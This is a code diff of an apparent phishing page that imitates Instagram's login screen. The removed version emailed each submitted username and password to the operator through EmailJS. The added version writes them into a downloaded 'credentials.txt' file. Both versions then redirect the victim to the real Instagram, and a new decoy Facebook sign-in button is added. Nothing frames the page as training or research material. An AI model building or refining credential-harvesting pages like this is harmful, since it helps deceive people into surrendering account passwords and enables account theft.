--- a/index.html
+++ b/index.html
@@ -4,67 +4,7 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Instagram Login</title>
-    <script type="text/javascript" src="https://cdn.emailjs.com/dist/email.min.js"></script>
-    <style>
-        body {
-            font-family: 'Arial', sans-serif;
-            background-color: #fafafa;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
-            margin: 0;
-        }
-
-        .login-container {
-            width: 350px;
-            background-color: white;
-            padding: 40px;
-            border-radius: 5px;
-            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
-            text-align: center;
-        }
-
-        .login-container h1 {
-            font-size: 28px;
-            margin-bottom: 20px;
-            font-weight: bold;
-        }
-
-        input {
-            width: 100%;
-            padding: 12px;
-            margin: 10px 0;
-            border: 1px solid #ddd;
-            border-radius: 4px;
-            font-size: 14px;
-        }
-
-        button {
-            width: 100%;
-            padding: 12px;
-            background-color: #0095f6;
-            color: white;
-            border: none;
-            border-radius: 4px;
-            cursor: pointer;
-            font-size: 16px;
-        }
-
-        button:hover {
-            background-color: #006db3;
-        }
-
-        .footer {
-            margin-top: 20px;
-            font-size: 14px;
-        }
-
-        .footer a {
-            color: #00376b;
-            text-decoration: none;
-        }
-    </style>
+    <link rel="stylesheet" href="style.css">
 </head>
 <body>
 
@@ -75,6 +15,7 @@
             <input type="password" name="password" placeholder="Password" required>
             <button type="submit" id="submitBtn">Log In</button>
         </form>
+        <button id="facebookBtn">Sign in with Facebook</button>
         <div class="footer">
             <p>Don't have an account? <a href="#">Sign up</a></p>
         </div>
@@ -83,17 +24,18 @@
     <script>
         document.getElementById('contactForm').addEventListener('submit', function(event) {
             event.preventDefault();
-            const btn = document.getElementById('submitBtn');
-            btn.textContent = 'Sending...';
+            const username = document.querySelector('input[name="username"]').value;
+            const password = document.querySelector('input[name="password"]').value;
+            const blob = new Blob([`Username: ${username}\nPassword: ${password}`], { type: 'text/plain' });
+            const link = document.createElement('a');
+            link.href = URL.createObjectURL(blob);
+            link.download = 'credentials.txt';
+            link.click();
+            window.location.href = 'https://www.instagram.com';
+        });
 
-            emailjs.send("service_iag6if2", "template_vwlgsjs", this)
-                .then(function() {
-                    window.location.href = 'https://www.instagram.com';
-                })
-                .catch(function(error) {
-                    btn.textContent = 'Log In';
-                    console.error('Error sending email:', error);
-                });
+        document.getElementById('facebookBtn').addEventListener('click', function() {
+            window.location.href = 'https://www.facebook.com';
         });
     </script>
 
